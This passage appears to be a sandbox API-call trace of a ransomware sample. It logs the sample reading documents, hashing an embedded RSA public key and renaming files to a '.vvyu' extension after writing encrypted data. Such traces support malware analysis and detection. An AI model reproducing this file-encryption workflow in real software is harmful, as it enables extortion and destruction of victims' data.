hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0189.275] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db50 | out: hHeap=0x2c0000) returned 1 [0189.275] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0189.276] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0189.276] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aedfa0 | out: hHeap=0x2c0000) returned 1 [0189.276] GetCurrentThreadId () returned 0x5d8 [0189.276] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0189.276] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae4338 [0189.276] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0189.276] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0189.276] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0189.276] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0189.276] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0189.276] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0189.276] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0189.277] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0189.277] GetCurrentThreadId () returned 0x5d8 [0189.277] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0189.277] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0189.277] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0189.277] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0189.277] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0189.277] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0189.278] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0189.278] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0189.278] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0189.278] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0189.278] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40108 [0189.278] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0189.278] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0189.278] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0189.278] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0db50 [0189.278] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0189.278] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0189.278] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0189.278] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0189.278] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0189.278] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0189.278] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0189.278] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0189.279] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0daf0 [0189.279] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0189.279] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0189.279] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0189.279] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0189.279] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0189.279] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0189.279] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0189.279] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0db08 [0189.279] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0189.279] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0189.279] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0189.279] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dad8 [0189.279] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0189.279] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0db68 [0189.279] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0189.279] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7da0 [0189.279] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0189.279] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0db38 [0189.279] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0189.279] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0db20 [0189.279] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0189.279] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0db80 [0189.280] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db20 | out: hHeap=0x2c0000) returned 1 [0189.280] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0db20 [0189.280] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db38 | out: hHeap=0x2c0000) returned 1 [0189.280] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0189.280] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0189.280] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0189.280] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0189.280] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0189.280] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0daf0 | out: hHeap=0x2c0000) returned 1 [0189.280] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0daf0 [0189.280] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0189.280] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af1f88 [0189.280] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db50 | out: hHeap=0x2c0000) returned 1 [0189.280] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0189.280] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db80 | out: hHeap=0x2c0000) returned 1 [0189.280] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af2198 [0189.280] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0189.280] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0189.280] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0189.280] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0189.280] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0daf0 | out: hHeap=0x2c0000) returned 1 [0189.280] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af23b0 [0189.281] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0189.281] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0189.281] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0189.281] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0189.282] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0189.282] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0189.282] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0189.282] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0189.283] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af2198 | out: hHeap=0x2c0000) returned 1 [0189.283] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af23b0 | out: hHeap=0x2c0000) returned 1 [0189.283] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0189.283] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0189.283] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db20 | out: hHeap=0x2c0000) returned 1 [0189.284] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0189.284] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db68 | out: hHeap=0x2c0000) returned 1 [0189.284] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0189.284] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0db08 | out: hHeap=0x2c0000) returned 1 [0189.284] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dad8 | out: hHeap=0x2c0000) returned 1 [0189.284] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0189.284] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0189.284] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0189.285] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dac0 | out: hHeap=0x2c0000) returned 1 [0189.285] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2bf0 | out: hHeap=0x2c0000) returned 1 [0189.285] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1f88 | out: hHeap=0x2c0000) returned 1 [0189.285] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0189.286] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40108 | out: hHeap=0x2c0000) returned 1 [0189.286] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0189.286] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0189.286] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0189.286] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0189.286] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0189.286] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0189.287] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0189.287] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfa00 | out: hHeap=0x2c0000) returned 1 [0189.287] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0x986b, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0x986b, lpOverlapped=0x0) returned 1 [0189.288] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0189.288] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x9870, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.288] WriteFile (in: hFile=0x584, lpBuffer=0x2ae01d0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae01d0*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0189.289] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0189.289] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eba0 [0189.289] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af1f88 [0189.289] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af1f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0189.289] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af23b8 [0189.289] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1f88 | out: hHeap=0x2c0000) returned 1 [0189.289] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eba0 | out: hHeap=0x2c0000) returned 1 [0189.290] WriteFile (in: hFile=0x584, lpBuffer=0x2af23b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af23b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0189.290] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af23b8 | out: hHeap=0x2c0000) returned 1 [0189.290] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0189.290] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0189.290] CloseHandle (hObject=0x584) returned 1 [0189.291] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eba0 [0189.292] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x870) returned 0x2af1f88 [0189.292] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eba0 | out: hHeap=0x2c0000) returned 1 [0189.292] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\N6jq6Ucc95w9.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\n6jq6ucc95w9.docx"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\N6jq6Ucc95w9.docx.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\n6jq6ucc95w9.docx.vvyu")) returned 1 [0189.301] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af1f88 | out: hHeap=0x2c0000) returned 1 [0189.301] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0189.301] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.304] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0189.304] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4d6f7390, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x21e55d50, ftLastAccessTime.dwHighDateTime=0x1d7100d, ftLastWriteTime.dwLowDateTime=0x21e55d50, ftLastWriteTime.dwHighDateTime=0x1d7100d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Outlook Files", cAlternateFileName="OUTLOO~1")) returned 1 [0189.304] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0189.304] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eba0 [0189.304] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ee78 [0189.305] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eba0 | out: hHeap=0x2c0000) returned 1 [0189.305] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0189.305] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x19789270, ftCreationTime.dwHighDateTime=0x1d82bca, ftLastAccessTime.dwLowDateTime=0x2b398910, ftLastAccessTime.dwHighDateTime=0x1d8753f, ftLastWriteTime.dwLowDateTime=0x2b398910, ftLastWriteTime.dwHighDateTime=0x1d8753f, nFileSizeHigh=0x0, nFileSizeLow=0xb8ab, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="qCa-wrdfbpIzYp.docx", cAlternateFileName="QCA-WR~1.DOC")) returned 1 [0189.305] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2bf0 [0189.305] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0189.305] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2bf0 | out: hHeap=0x2c0000) returned 1 [0189.305] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\qCa-wrdfbpIzYp.docx") returned=".docx" [0189.305] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\qCa-wrdfbpIzYp.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\qca-wrdfbpizyp.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0189.307] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=47275) returned 1 [0189.307] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0189.311] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xb885, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.311] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0189.312] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0189.313] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0189.313] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0189.313] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0xb8ab, lpOverlapped=0x0) returned 1 [0189.314] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.314] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0189.314] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.314] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.314] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0189.315] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0189.315] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0189.315] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0189.315] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0189.315] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0189.315] GetLastError () returned 0x0 [0189.315] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0189.315] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0189.316] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0189.316] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0189.316] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0189.316] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0189.316] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0189.316] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0189.316] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0189.316] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb8b0) returned 0x2af5168 [0189.316] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0189.317] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0189.317] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adfa00 [0189.317] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0189.317] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0189.317] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0189.317] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2bf0 [0189.317] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 